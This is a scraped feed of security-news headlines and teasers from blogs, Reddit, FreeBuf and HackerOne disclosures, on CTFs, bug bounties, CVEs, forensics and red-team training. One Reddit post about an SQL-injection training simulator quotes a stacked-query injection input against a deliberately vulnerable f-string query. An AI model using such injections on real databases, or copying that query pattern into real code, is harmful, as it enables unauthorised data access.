    AspectJWeaver利用链绕过serialKiller by SecIN社区 测量俄罗斯对 Twitter 的大规模拦截 by Avenger 更多最新文章,请访问SecWiki
  • Open

    TryHackMe | Advent of Cyber Part 3
    Hi there! In this article, we’ll continue “Advent of Cyber 2022” room in TryHackMe together. Continue reading on Medium »
    Steel Mountain
    Reconnaissance Continue reading on Medium »
    Internal
    Reconnaissance Continue reading on Medium »
    Ignite
    Reconnaissance Continue reading on Medium »
    ACTIVE DIRECTORY 201 — BREACHING A DOMAIN
    Well done on setting up an Active Directory Lab. Continue reading on Medium »
    HackPark
    Reconnaissance Continue reading on Medium »
  • Open

    Disclosing a New Vulnerability in JWT Secret Poisoning (CVE-2022-23529)
    We discovered a new high-severity vulnerability (CVE-2022-23529) in the popular JsonWebToken open source project. The post Disclosing a New Vulnerability in JWT Secret Poisoning (CVE-2022-23529) appeared first on Unit 42.
  • Open

    FreeBuf早报 | 高通骁龙漏洞影响联想等设备;俄黑客组织攻击美国核实验室
    数字政府数据安全建设中,引入了很多新技术、新模式、新体系。
    智能合约安全审计入门篇 —— 移花接木
    如何识别在合约中隐藏的恶意代码?
    2022年我国网络安全法规一览 | FreeBuf年度盘点
    本文带大家看看2022年网络安全行业都出台了哪些法律、法规、条例、指导意见。
    红队渗透项目之Raven-1
    简介该项目是William McCann作者的第二个项目的,目标是获取获得root权限并找到flag.txt文本信息,该项目作为OSCP考试培训必打的一个项目环境,该作者评定该环境为渗透中级水准难度。接下来不管是零基础学习渗透者,还是有些基础的渗透者,甚至是高水平的渗透人员读该的技巧和文章都能学习到一些红队知识。该项目有始有终会用到 信息收集 -> 端口信息枚举 -> PHPMaile
    使用服务网格提升应用和网络安全
    云原生和微服务等下一代技术已经消除了边界。过去,公司的资产有明确的边界与外界隔开。现在,没有“内部”与“外部”之分;一切都被认为是“外部”。更大的攻击面意味着网络犯罪分子有更多机会。企业又该如何减少攻
    法航和荷航部分客户个人信息被盗
    法航和荷航已经通知“蓝天飞行”的旅客,他们的一些个人信息可能暴露了。
    ThreadLocal源码解析及实战应用
    我们创建的变量是可以被任何一个线程访问并修改的,而使用ThreadLocal创建的变量只能被当前线程访问,其他线程则无法访问和修改。
    英国多所学校数据遭大规模泄露,教育行业成勒索软件的主目标
    在 2022 年发生高校攻击事件后,来自 14 所英国学校的数据被黑客在线泄露。
    《网络安全标准实践指南—车外画面局部轮廓化处理效果验证(征求意见稿)》发布
    《指南》给出了验证车外画面进行人脸、车牌局部轮廓化处理效果的流程、方法及验证标准。
    京音平台-一起玩转SCRM之电销系统
    电销是什么?就是坐席拿着电话给客户打电话吗?no no no,让我们一起走进京音平台之电销系统。京音平台2020年初开始建设,过去的两年多的时间里,经历了跌宕起伏,有经验、有教训。
  • Open

    Unwrapping Ursnifs Gifts
    submitted by /u/TheDFIRReport [link] [comments]
  • Open

    Local to Domain
    So busy with an engagement and managed to get onto a server with local access only. Mimimatz and dumping hashes only shows local account information. Same result with Mimikatz elevation requests. Kerberoast shows no info as it is being run under a local user. Any other tips on how one can elevate from local to domain? submitted by /u/0xDumbAss [link] [comments]
    How To Attack Admin Panels Successfully Part 2
    submitted by /u/banginpadr [link] [comments]
  • Open

    一种 Foxit Reader 漏洞利用思路探索
    作者: 360漏洞研究院 李双 原文链接:https://vul.360.net/archives/648 背景 Foxit Reader(旧名:Foxit PDF Reader),是一套用来阅读PDF格式文件的软件,由福建福昕软件所研发。 在 Adobe Reader 以及旧版本的 Foxit Reader 中,通常会利用 JS 的 ArrayBuffer 来布局内存并最终实现任意代码执行...
  • Open

    一种 Foxit Reader 漏洞利用思路探索
    作者: 360漏洞研究院 李双 原文链接:https://vul.360.net/archives/648 背景 Foxit Reader(旧名:Foxit PDF Reader),是一套用来阅读PDF格式文件的软件,由福建福昕软件所研发。 在 Adobe Reader 以及旧版本的 Foxit Reader 中,通常会利用 JS 的 ArrayBuffer 来布局内存并最终实现任意代码执行...

  • Open

    HTML injection in an email template
    Send emails on behalf of a company? Here’s how I found this vulnerability in several large companies allowing me to easily earn bounties. Continue reading on Medium »
    How To Attack Admin Panels Successfully Part 2
    Not Attacking Web Apps Admin Panels The Right Way? Continue reading on Geek Culture »
    XSS Bypass for Rich Text Editors
    Tips for bypassing XSS filters in rich text editors like TinyMCE Continue reading on The Gray Area »
    Subdomain Scanning 101: What You Need to Know
    Subdomain scanning is a process of identifying subdomains for a given domain. This can be useful for a number of reasons, such as… Continue reading on Medium »
    How to automate your initial recon and extend ASM using Sub-Scout
    This blog explains how Sub-Scout works and how can you use it in your recon workflow. Continue reading on Medium »
    Algorand: Bug Bounty Program, Lebih Dari $2 Juta Di Alokasikan Sebagai Hadiah
    Algorand — jaringan blockchain layer-1 dengan mekanisme konsensus proof of stake yang terbukti ramah lingkungan dan karbon-negatif, telah… Continue reading on Medium »
    My First Bug Bounty Reward : $100 in 5 min
    Hello everyone, Continue reading on Medium »
    How to Get Started in Bug Bounty by ChatGPT
    The blog that ChatGPT wrote for me on bug bounty Continue reading on Medium »
    —
    Want to learn or sharpen your skills in API pentest? Now is the time Continue reading on Medium »
  • Open

    Look Ahead: What Network Security Will Look Like in 2023
    Network security is an ever-evolving field, and it’s important to stay up to date on the latest trends in order to protect your data and… Continue reading on Medium »
    SPY NEWS: 2023 — Week 1
    Summary of the espionage-related news stories for the Week 1 (January 1–7) of 2023. Continue reading on Medium »
    Hacktoria Follow The Black Rabbit Write up
    Attempt the challenge first before read this write up, thank you :) Continue reading on Medium »
  • Open

    Red Team Fundamentals
    Introduction Continue reading on Medium »
    Persistence ways
    Gaining continued access to a computer system or network that has been compromised is known as persistence. It requires bypassing security… Continue reading on Medium »
    Querier
    Reconnaissance Continue reading on Medium »
    Alfred
    Reconnaissance Continue reading on Medium »
    Bastard
    Reconnaissance Continue reading on Medium »
  • Open

    Ultimate Windows Wallpaper Pack, a collection of 12000+ official Windows wallpapers from 1990 to present
    submitted by /u/fusoxide [link] [comments]
    Cat gifs and images
    https://welovecatsandkittens.com/wp-content/uploads/ https://www.tonictutor.com/app/webroot/img/cats/ https://fun.bgjargon.com/lolcats/ submitted by /u/Waste-Release-6235 [link] [comments]
    Midi music
    https://nlp.biu.ac.il/~amit/datasets/Midi/MidiCollection/ https://www.lilesnet.com/music/midi/ https://modland.ziphoid.com/incoming/vault/MIDI/ https://www.vgmusic.com/music/console/ http://gansweith.freehostia.com/midi/ submitted by /u/Waste-Release-6235 [link] [comments]
    Looking for a directory link that was posted
    There was a link that posted to an OD or possibly a Google drive of a bunch of DJ mixes. It was some time in the past year but I am unable to find it and I do not have it in my link directory. Shot in the dark but does this ring a bell for anyone else? I swear I commented on the post but I am not even able to find a comment. submitted by /u/belly_hole_fire [link] [comments]
    How to view most popular videos of a youtube channel during specific time period (e.g. past year)?
    Do you see that you can view top posts of a subreddit during specific time period? Does Youtube have similar thing for a channel exclusively? Is there any trick to do this? submitted by /u/Almangool [link] [comments]
  • Open

    Interactive Risk Explorer for Understanding Software Supply Chain Attacks
    submitted by /u/ewok94301 [link] [comments]
    Bring your own vulnerable driver to the exploit party: Understanding BYOVD Attacks
    submitted by /u/achilles4828 [link] [comments]
    Analyzing CVE-2022-46630 (DLL Hijacking in Squirrel.Windows)
    submitted by /u/DLLCoolJ [link] [comments]
    Strategies for effective CSRF mitigation
    submitted by /u/DeliveryTypical [link] [comments]
  • Open

    Simulator project - Simulated SQL Injection vulnerability
    Hello, I am working on a project, creating a training simulator dedicated to SQL Injection training tasks. The main logic is coded in Python and the database that needs to be compromised in the tasks is PostgreSQL. However, when I try to send a request to the API on the backend where I put the entire input into the query, for example: f"SELECT * FROM users WHERE username= '{username}';" As input (for dynamic param "username") I used for testing for example: '; SELECT * FROM users; -- and when I execute via command from psycopg2 lib, it returns an error, and when I try it in the console in my local PostgreSQL database, it works correctly. Does anyone know how to approach such simulated SQL injection requests? Am I using the wrong library or what do you think could be wrong? Thanks for every answer. submitted by /u/Anonym_DumboOctopus [link] [comments]
    transitioning from IT and OT Cybersecurity
    Questions for IT cybersecurity experts who extended their dominance on OT Security, is SANS GISCP recommended for someone who wants to be good at OT security domain? Any suggested how to start and certification to target for? submitted by /u/junostik [link] [comments]
    Books for finding C/C++ vulnerabilties?
    I have already read Secure Coding in C and C++ by SEI and Hacking: The Art of Exploitation by Erickson. What other books are out there for someone who wishes to break into vulnerability research? I'm specifically interested in finding vulnerabilities in open-source C and C++ code. submitted by /u/jafarlihi [link] [comments]
    Are CSPRNGs even hackable in any way? I've only found research on basic PRNGs
    You would think academia would have theoretical attacks against CSPRNGs by now but it seems like it's deterministic to an extent and can be broken if you can replicate the original seeding. the best CSPRNGs feed in data from things like linuxes dev/urandom which the man pages states is "environmental noise". If you do OSINT on the company your trying to hack say in this example it's a web application with a heavily fortified pass reset token algorithm using a CSPRNG that feeds in data from dev/urandom. Now say you find out there using a Dell optiplex server rack and you know the typical CPU and Mobo setup even down to the exact ram sticks. Couldn't the attacker replicate the same environmental noise by setting up an environment as close as possible to the targets server environment and run dev/urandom getting a bunch of similar seeds and one of these seeds is bound to allow you to predict the next reset token. Best example I can think of but surely CSPRNGs must have some sort of flaw and I haven't even touched upon the various types of side channel attacks like differential fault analysis by lagging the server or injecting predictable faults into the web app to get consistent enough environmental noise to get a predictable seed to appear allowing token prediction that way. The second attack is theoretically possible because it's a known flaw where when a Linux box is first booted up the first few numbers from dev/urandom has the lowest entropy but I believe this issue was fixed I just remember reading it somewhere. submitted by /u/TheCrazyAcademic [link] [comments]
  • Open

    A Detailed Guide on Kerbrute
    Background Kerbrute is a tool used to enumerate valid Active directory user accounts that use Kerberos pre-authentication. Also, this tool can be used for password
    A Detailed Guide on Kerbrute
    Background Kerbrute is a tool used to enumerate valid Active directory user accounts that use Kerberos pre-authentication. Also, this tool can be used for password
  • Open

    Mac Forensics - SIP
    Hello everyone, I'm a forensics analyst and working on a case where System Integrity Protection was disabled on a Mac. We are looking for evidence indicating the user of the system manually disabled it. Any ideas on where to start? Thanks in advance! submitted by /u/clew161990 [link] [comments]
    I’m just about to finish my Bachelor Honours in Forensic Security degree, what certs should I add to my CV?
    What will help buff out my CV, I currently have 0 certifications and would ideally like to try and get some before going into the forensic job world, try and help give me an advantage submitted by /u/fgtethancx [link] [comments]
  • Open

    Offensive Rust
    OFFENSIVE RUST Launched! Want to level up your offensive security game? Check out our new Rust for Offensive Security course! From Rust basics to advanced techniques like Active Directory enumeration, reverse shells, and hiding processes, we've got you covered. Enroll now to take your skills to the next level! ⚙️ Rust Basics ⚙️ Advanced Rust ⚙️ Enumerating Active Directory ⚙️ Executing OS Commands ⚙️ A Rusty reverse shell ⚙️ Introduction to WINAPI ⚙️ Shellcode Injection ⚙️ DLL Injection ⚙️ Windows Named Pipes ⚙️ DLL Proxying ⚙️ Writing our Reflective Loader ⚙️ Process Hollowing ⚙️ Process Doppelganging ⚙️ Patching AMSI ⚙️ API Hashing ⚙️ API Hooking ⚙️ Hooking IAT ⚙️ Hiding any process from task manager ⚙️ NTFS Transactions https://redteamsorcery.teachable.com/p/offensive-rust infosec #cybersecurity #redteam #malware submitted by /u/nikkithegr8 [link] [comments]
  • Open

    SecWiki News 2023-01-08 Review
    玩转CodeQLpy之代码审计实战案例 by ourren code-inspector: 基于字节码分析的Java代码审计工具 by 路人甲 Patch diff an old vulnerability in Synology NAS by 路人甲 GitLab结合fortify实现自动化代码审计实践 by 路人甲 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-01-08 Review
    玩转CodeQLpy之代码审计实战案例 by ourren code-inspector: 基于字节码分析的Java代码审计工具 by 路人甲 Patch diff an old vulnerability in Synology NAS by 路人甲 GitLab结合fortify实现自动化代码审计实践 by 路人甲 更多最新文章,请访问SecWiki
  • Open

    Race condition in joining CTF group
    HackerOne disclosed a bug submitted by zeyu2001: https://hackerone.com/reports/1540969 - Bounty: $500
  • Open

    Vulnerability Research Digest – Issue 1 (macOS/iOS in 2022)
    Article URL: https://alexplaskett.github.io/macos-ios-security-research/ Comments URL: https://news.ycombinator.com/item?id=34297792 Points: 1 # Comments: 0
  • Open

    JNDI Injection Series: RMI Vector - Insecure Deserialization
    No content preview
  • Open

    JNDI Injection Series: RMI Vector - Insecure Deserialization
    No content preview
  • Open

    JNDI Injection Series: RMI Vector - Insecure Deserialization
    No content preview

  • Open

    curl file writing susceptible to symlink attacks
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1814824
    libssh backend CURLOPT_SSH_HOST_PUBLIC_KEY_SHA256 validation bypass
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1825377
    HEIC image preview can be used to invoke Imagick
    Nextcloud disclosed a bug submitted by lukasreschkenc: https://hackerone.com/reports/1261413
  • Open

    GUARDARA 0.9.9 Available with Web Service Testing
    submitted by /u/JohnKeymanUK [link] [comments]
    VSCode Supply Chain Attacks: Protect Your IDE from Malicious Extensions
    submitted by /u/gfdgfbal [link] [comments]
    connmap now works with all DE/WM! Desktop widget that shows location of your current TCP peers on a world map in real-time.
    submitted by /u/jafarlihi [link] [comments]
    Reflections on Trusting VEX (or when humans can improve SBOMs)
    submitted by /u/dlorenc [link] [comments]
    Setting up your bug bounty scripts with Python and Bash — The subdomain monitoring bot
    submitted by /u/Plenty-Mix-2 [link] [comments]
    Manipulating AES Traffic using a Chain of Proxies and Hardcoded Keys
    submitted by /u/Gallus [link] [comments]
  • Open

    Open Redirect Attack #learn365days
    An open redirect is an endpoint on a vulnerable website, or Open redirect are when a web page takes an invalidated user-submitted… Continue reading on Medium »
    How to perform dynamic analysis of a smart contract with Myth
    Myth is a tool developed by Consensys that does dynamic analysis of a Solidity smart contract. It has a paid version called MythX and and… Continue reading on Medium »
    How to begin Cybersecurity in 2023 ?
    So, You wanna be HACKER. Of course, so you have stumbled upon this medium post. Before diving deep into the road map or content. I just… Continue reading on Medium »
    4 Reasons you are not able to find bugs
    The most important part of finding bugs is scanning, Continue reading on Medium »
    The Dangers of Remote Code Execution (RCE)
    Remote Code execution vulnerabilities are particularly dangerous, allowing attackers to take complete control of computers. Continue reading on The Gray Area »
  • Open

    AppSec/RedTeam/Pentester
    I'm 23 and I'm attending a evening computer science high school made for adults who dropped out studies in adolescence. Cybersecurity seems to me very interesting so I trying to do some research about different job roles. I discovered that Cybersecurity isn't a first job so my intention is find a job as Java Backend Developer and after a few years of experience I'll look for security jobs. Of all the roles I have seen the ones I am most curious about are the ones mentioned in the title. I don't understand how they differ from each other, are they synonyms for the same role ? With a few years of experience as a backend developer can you get into these roles ? Do you have advice on the top people in this area to follow on Twitter ? Do you know of communities ? Conferences to participate in ? submitted by /u/HelloWorldCLang [link] [comments]
    why don't enterprises, specifically schools, implement this?
    So I found an article that explains how to prevent keyloggers on Windows, Mac, and Linux: https://www.makeuseof.com/tag/disable-usb-storage-devices/ I know there is already software out there for software keyloggers (i.e. DeepFreeze) but this would literally block any devices aside from the keyboard or mouse and the settings to do it are there. Wouldn't this be good to prevent students from cheating in schools? I had a conversation with a physics teacher about this but I am an IT student who also studies cybersecurity in his spare time and maybe there's something I'm not getting but if a setting is this easy why is it not implemented? submitted by /u/notburneddown [link] [comments]
    Deauth Packet signal detection for specified locations
    Quick question regarding this. If someone were to send packets to capture a handshake and isn’t actively transmitting deauth packets, is it still possible to detect where exactly the attack is coming from? I’m aware that wireshark can detect the signal strength of the packets but ultimately wouldn’t you need a spectrum analyzer to see exactly where it’s coming from? Also what if they put a piece of tinfoil or something to weaken/strengthen the signal to make it appear further/closer to the device than it actually is. Cheers. submitted by /u/Downtown-Sprinkles38 [link] [comments]
  • Open

    SecWiki News 2023-01-07 Review
    2022国内网络安全融资分析 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-01-07 Review
    2022国内网络安全融资分析 by ourren 更多最新文章,请访问SecWiki
  • Open

    Géolocalisations de photos, pt. II
    2 enquêtes pour vous mesdames et messieurs. Continue reading on Medium »
  • Open

    Is CHFI the CEH of the forensics world?
    I ask because I have free training and vouchers available for CHFI. I'm already in a forensics role with just a university certificate but no industry certs. I want something to add to my knowledge depth that comes with credentials. submitted by /u/dgree049 [link] [comments]
    The Linux Process Journey — “kdevtmpfs”
    submitted by /u/boutnaru [link] [comments]
  • Open

    Modern Windows Command & Control / Implants
    submitted by /u/dmchell [link] [comments]
  • Open

    Anonimato y privacidad
    Durante una campaña de Red Team es importante asegurarse de que las conexiones sean lo suficientemente robustas y anónimas para evitar ser… Continue reading on Medium »
  • Open

    Old archive of stuff
    https://ftp.funet.fi ​ submitted by /u/Waste-Release-6235 [link] [comments]
  • Open

    PHP反序列化从0到1
    总结了php反序列化的利用方式,几乎涵盖了所有的地方,也参考了不少师傅的文章,如有不足请师傅们指点
  • Open

    Blueprint for All Pentests!
    CyberDucky is ready to hack! Hope you all are having a great year so far. Thank you for all the love. Blueprint for how a pentest is structured! https://youtu.be/6o25auMAVv8 submitted by /u/cyberducky0_0 [link] [comments]

  • Open

    Géolocalisation d’une image : explications.
    L’image nous vient directement du compte @quiztime, sur Twitter. Je n’ai pas d’indices et seulement cette image. Continue reading on Medium »
  • Open

    Bypassing CrowdStrike Falcon with Pracsec's New AMSI Bypass
    I took Pracsec's new AMSI bypass method and walked PowerUp by Crowdstrike Falcon. Check it out! https://www.youtube.com/watch?v=5e0uDVE35mk https://github.com/pracsec/AmsiBypassHookManagedAPI submitted by /u/Infosecsamurai [link] [comments]
    HTML Smuggling: Recent observations of threat actor techniques
    submitted by /u/Trop_Chaud [link] [comments]
    Is Your MS Exchange Server Safe?
    submitted by /u/cheeztoshobo [link] [comments]
  • Open

    I made an Open Source Browser extension to aid in Threat Investigations!
    submitted by /u/zack7601 [link] [comments]
    TruffleHog Now Scans CircleCI log outputs for passwords/credentials
    submitted by /u/wifihack [link] [comments]
    udon: A simple tool that helps to find assets/domains based on the Google Analytics ID.
    submitted by /u/BananaBounty [link] [comments]
    I scanned every package on PyPi and found 57 live AWS keys
    submitted by /u/Most-Loss5834 [link] [comments]
    LastPass Breach - What went wrong?
    submitted by /u/GelosSnake [link] [comments]
    Latest activity from Turla {Mandiant}
    submitted by /u/EspoJ [link] [comments]
    How the Lastpass Breach affects Lastpass SSO
    submitted by /u/csanders_ [link] [comments]
    Fetch Diversion
    submitted by /u/albinowax [link] [comments]
    The Mac Malware of 2022
    submitted by /u/KolideKenny [link] [comments]
    Variant analysis of CVE-2022-3515 affecting libksba, which resulted in CVE-2022-47629
    submitted by /u/Gallus [link] [comments]
    Announcing the Ronin 2.0.0 Open Beta. Ronin is a free and Open Source Ruby toolkit for security research and development.
    submitted by /u/postmodern [link] [comments]
  • Open

    Container security interview
    As the title says i have an interview for container security role. I just wanted to pick your brain ok what i should focus on the technical side of things? As for me i have experience in vulnerability management,secops, and a part time role at a k8s team. submitted by /u/hannibal_the_general [link] [comments]
    Are randomish passphrase passwords equally secure to random?
    After this latest breach, I'm ditching LastPass. I have a pretty good master password that is 12 random characters, but I'm fed up with company. I'm going to try Bitwarden, and I'm going to use a passphrase as my master password. My question is, would a passphrase following an acronym be just as secure as random words? For example, if my name was Casey, would the phrase "curfew attitude scored eskimo yelling" be vulnerable? submitted by /u/MegaRadCoolDad [link] [comments]
    Employee syncing files with ex employee/competitor?
    Hello, i'm looking for some opinions on this subject. So we had a guy that worked as a coordinator for our company for 23 years and then quit to go start up his own company that is exactly the same. We are a company that has government contracts as we are a subcontractor. So the woman that does the background checks and payroll, who has also been employed with the company for over a decade, let us know this week that she was leaving to go work for his company . Today we found in her deleted folder in her email, that she was sending something to him monthly since September that said "file synchronization" but because the email it deleted, we cant see the the whole thing. The first time it said that the synchronization failed, but then said it was successful and since then, a new email goes each month that says the same thing. We use outlook, invoicing software and a CRM. Our IT guy is currently looking into it but in the mean time, just wanted some opinions on what maybe this could be ? I think of good potential hires but why wouldnt she just email him those? has to be more than that... Thanks in advance! submitted by /u/StreetIndependence79 [link] [comments]
    Would you use ZeroTier in production?
    I'm not exactly concise, so TLDR at the bottom. My situation is that I teach an intro to devops sort of course at a vocational school. At the end of the course my students have to setup an environment with an AD and some clients, document networking and do a bit of python. In relation to this, the students have to setup VPN connectivity for signing on to the AD from remote networks. And this is where my question stems from. A few students have used ZeroTier as a free VXLAN service. I haven't taught this, as anything more than a simple PPTP VPN is extracurricular. I understand why the students have gone this route, I wished we didn't have to deal with 3 layers of NAT at my school, and I get the concept. I'm just not sure if I'd want to use a free service for transporting my traffic, while also providing the software that handles the keys. It just screams of begging to a MitM attack TL;DR: Have you considered/analyzed ZeroTier, or the like, for use in production? submitted by /u/BigDanishGuy [link] [comments]
    I accidentally input my SSN over public wifi. What should I do?
    I was applying for a credit card in Amazon. I put my SSN, number, etc in the form. Later on I realized I wasn't on data but connected in my hospital's guest wifi. Should I be concerned? Please im panicking right now 😭😭😭 submitted by /u/Cute_Tumbleweed3752 [link] [comments]
    Share your Incident Response stories with me
    Hi AskNetSec, I would love to hear from members of this community about times they've been in serious and moderate incidents where services have been hacked, or services have failed. What happened, how you felt at the time, were you the hero? what did you learn? Did you get an rush of energy? I'm not looking for your day to day descriptions of what you do - just stories of real incident - I'd just like to read some stories in this area! submitted by /u/CyberStagist [link] [comments]
  • Open

    Everything about Cookie and Its Security
    What is a cookie and why is it used? Continue reading on Medium »
    How I Found My First Vulnerbility/Bug Bounty at Hackerone.
    Hi guys! In this article i will talk about How i was able to find my first Vulnerbility/Bug Bounty at Hackerone, And I hope you will like… Continue reading on Medium »
    How I Hacked my university’s Lab Portal and gained access to all accounts :)
    A tale of IDOR leads to account takeover!!! Continue reading on Medium »
    Bug Zero at a Glance [Week 31 December–06 January]
    What Happened with Bug Zero? Continue reading on Bug Zero »
    Cross-Site Scripting — XSS [CWE-79]
    Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) Continue reading on Medium »
    Bug Zero at a Glance [Week 31–06 January]
    What happened with Bug Zero? Continue reading on Medium »
    Identity-Aware Proxy Misconfiguration- Google Cloud Vulnerability
    First, we need to know what Identity-Aware Proxy (IAP) is and how it works to exploit it… Continue reading on Medium »
    How to use solium (Ethlint) to audit smart contracts
    Ethlint (formerly solium) is a tool that analyze your smart contract for style and security issues. Continue reading on Medium »
    Tired of searching for Bug Bounty Reports
    Here you can Search for any reports you need with your preferences, Nicely categorized and Easy searching. Continue reading on Medium »
    Scheduling Recon Scripts with Docker
    Cronjobs are useful for scheduling tasks to run automatically at a specified time or interval. In this tutorial, we’ll go over how to set… Continue reading on The Gray Area »
  • Open

    IDOR when editing email leads to Mass Full ATOs (Account Takeovers) without user interaction on https:///
    U.S. Dept Of Defense disclosed a bug submitted by int_lulz: https://hackerone.com/reports/1687415
    Reflected XSS
    U.S. Dept Of Defense disclosed a bug submitted by f6x: https://hackerone.com/reports/1390131
    stored cross site scripting in https://
    U.S. Dept Of Defense disclosed a bug submitted by maskedpersian: https://hackerone.com/reports/1657033
    stored cross site scripting in https://
    U.S. Dept Of Defense disclosed a bug submitted by maskedpersian: https://hackerone.com/reports/1657006
    Unauthenticated phpinfo()files could lead to ability file read at [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by theinternetofdefcon_: https://hackerone.com/reports/1794884
    stored cross site scripting in https://
    U.S. Dept Of Defense disclosed a bug submitted by maskedpersian: https://hackerone.com/reports/1660611
    stored cross site scripting in https://
    U.S. Dept Of Defense disclosed a bug submitted by maskedpersian: https://hackerone.com/reports/1660500
    stored cross site scripting in https://
    U.S. Dept Of Defense disclosed a bug submitted by maskedpersian: https://hackerone.com/reports/1657020
    stored cross site scripting in https://
    U.S. Dept Of Defense disclosed a bug submitted by maskedpersian: https://hackerone.com/reports/1657030
    stored cross site scripting in https://
    U.S. Dept Of Defense disclosed a bug submitted by maskedpersian: https://hackerone.com/reports/1666002
    stored cross site scripting in https://
    U.S. Dept Of Defense disclosed a bug submitted by maskedpersian: https://hackerone.com/reports/1665971
    stored cross site scripting in https://
    U.S. Dept Of Defense disclosed a bug submitted by maskedpersian: https://hackerone.com/reports/1665966
    Sql Injection At
    U.S. Dept Of Defense disclosed a bug submitted by w13d0m: https://hackerone.com/reports/1723896
    Local File Read vulnerability on [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by demon1c: https://hackerone.com/reports/1624670 - Bounty: $500
    [] Remote Code Execution at [CVE-2021-44529] [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by norwegianwood: https://hackerone.com/reports/1624172 - Bounty: $1000
    SQL Injection at https://.asp () [selMajcom] [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by haxor31337: https://hackerone.com/reports/1628408
    CSRF to ATO at https:///user/account [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by pwn33d: https://hackerone.com/reports/1624421 - Bounty: $500
    xss on reset password page
    U.S. Dept Of Defense disclosed a bug submitted by 0x53_0x52_0x59: https://hackerone.com/reports/1763404
    XSS via Client Side Template Injection on www./News/Speeches
    U.S. Dept Of Defense disclosed a bug submitted by chef_shell: https://hackerone.com/reports/1736317
  • Open

    E-Discovery Tool Recommendation
    Hey all, I was wondering if anyone could recommend an E-Discovery tool. We are a small forensic shop and sometimes have to run a set of keywords for litigation related matters. The issue is that the forensic tools that we use often hit on everything e.g. if the keyword was “NDA”, our tools may hit on NDA in code such as an email header, code in files, etc. Ideally we would like a tool that would hit on NDA in the email body/subject and contents of files. Is there a tool out there that does this? I don’t believe we need all the bells and whistles because we don’t host the data, but give it to counsel or another E-Discovery vendor for more E-Discovery work e.g. bates numbering, load file etc. Ideally we’re looking for an E-Discovey tool that has more “accurate” results as far as running keywords through email and file data. Thanks in advance. submitted by /u/hotsausce01 [link] [comments]
    Litigation E-Mail Tool for Collection / Analysis?
    I've been tasked with doing some initial discovery on around 40 email boxes that are split between Gmail and Microsoft 365 / Exchange. I'd like to get advice on a practical tool we can use to download and search the collection of mailboxes, allowing us to use keywords and constraints to find e-mail and then collect them into a PST or other repository for delivery to our lawyers. Any advice? submitted by /u/JABRONEYCA [link] [comments]
    SIFT Practice Cases
    Does anyone know of any resources for data that I can analyze with the SANS SIFT workstation? Can’t seem to find any intro cases with walk through for beginners. Thank you! submitted by /u/Terry-Hesticles [link] [comments]
  • Open

    SecWiki News 2023-01-06 Review
    美国2023财年网络安全预算分析与思考 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-01-06 Review
    美国2023财年网络安全预算分析与思考 by ourren 更多最新文章,请访问SecWiki
  • Open

    If you’re a penetration tester, DO THIS NOW!
    Hi all this is something that I hope can resonate with everyone. Developing tools as a penetration tester will deepen your understanding… Continue reading on System Weakness »
    Privileges Escalation Techniques (Basic to Advanced) in Linux
    Part-3 Continue reading on System Weakness »
  • Open

    DevSecOps needs maximum code coverage
    Tracking code coverage is one very meaningful measure of the success of your DevSecOps initiatives. Continue reading on Medium »
    FuzzingWeekly CW 1:
    Fuzzing is Cool, Actually: https://simplythetest.tumblr.com/post/705635085370687489/fuzzing-is-cool-actually Continue reading on Medium »
  • Open

    DevSecOps needs maximum code coverage
    Tracking code coverage is one very meaningful measure of the success of your DevSecOps initiatives. Continue reading on Medium »
    FuzzingWeekly CW 1:
    Fuzzing is Cool, Actually: https://simplythetest.tumblr.com/post/705635085370687489/fuzzing-is-cool-actually Continue reading on Medium »
  • Open

    FreeBuf X 极验 | 《2022年度虚假流量白皮书》重磅发布
    后疫情时代,随着各行业线下业务与线上业务的深度结合转型,流量思维的增量导向逐渐转向降本增效。
    美国加州隐私法终极指南
    介绍了美国加州有哪些隐私保护法,具体要求是什么。详细展开了CCPA要求,CCPA与CPRA的差异。
    FreeBuf早报 | 开发工具 CircleCI 曝出严重漏洞;2023 年网络攻击新趋势预测
    金融机构(36%)、政府(14%)、医疗(9%)和教育(8%)等行业更容易遭受攻击。
    FreeBuf 周报 | 2亿Twitter用户的数据被公开;2023,去哪儿又利用大数据杀熟?
    各位 Buffer 周末好,以下是本周「FreeBuf周报」
    Gophish:一款功能强大的开源网络钓鱼测试工具
    Gophish是一款功能强大的开源网络钓鱼测试工具,够帮助广大管理人员对企业员工进行安全意识培训。
    AI智能潜在威胁,黑客利用 ChatGPT轻松入侵网络
    人工智能聊天机器人虽然很有趣,但也存在风险,因为它能够就任何漏洞提供详细建议。
    法国对苹果公司处以 800 万欧元罚款,后者表示会上诉!
    苹果公司未经用户同意,在 App Store上收集用户数据,投放定向广告,被罚 800 万欧元。
    2022年全球勒索赎金TOP 10 | FreeBuf年度盘点
    2022年勒索软件攻击事件频发,有哪些产生了高额赎金?本文根据公开的报道或资料,盘点出2022年度赎金金额TOP10。
  • Open

    Fuzzing Is Cool, – Fuzzing Weekly CW 1
    Article URL: https://ioc.exchange/@FuzzingWeekly/109641921261958698 Comments URL: https://news.ycombinator.com/item?id=34273391 Points: 1 # Comments: 0
  • Open

    GeoCities midi archive
    http://reasonstation.nl/downloads/midi/GeoCities-MIDI-ArchiveTeam/ submitted by /u/Waste-Release-6235 [link] [comments]
  • Open

    Analysing Command Detected in Request Body
    No content preview
  • Open

    Analysing Command Detected in Request Body
    No content preview
  • Open

    Analysing Command Detected in Request Body
    No content preview

  • Open

    Links Update
    This week I added another tab and renamed my “Research Links” Google Sheet to “OSINT Links & Resources”. Continue reading on Medium »
    Maximizing the Value of Deep Dive Due Diligence, Background Checks, and HUMINT
    Deep dive due diligence, background checks, and HUMINT are valuable tools that help companies make informed decisions and protect their… Continue reading on Medium »
    We Can Make Your Total Life Private & Delete Your Entire Current Online Footprint
    The internet has become a haven for information, and the privacy of our personal data is at risk. The internet has been designed to be a… Continue reading on Medium »
    Ultimate OPSEC
    Don’t let Big Brother spy on you! Follow these all-powerful opsec rules to stay safe and secure Continue reading on Medium »
    Isn’t OSINT just glorified Googling?
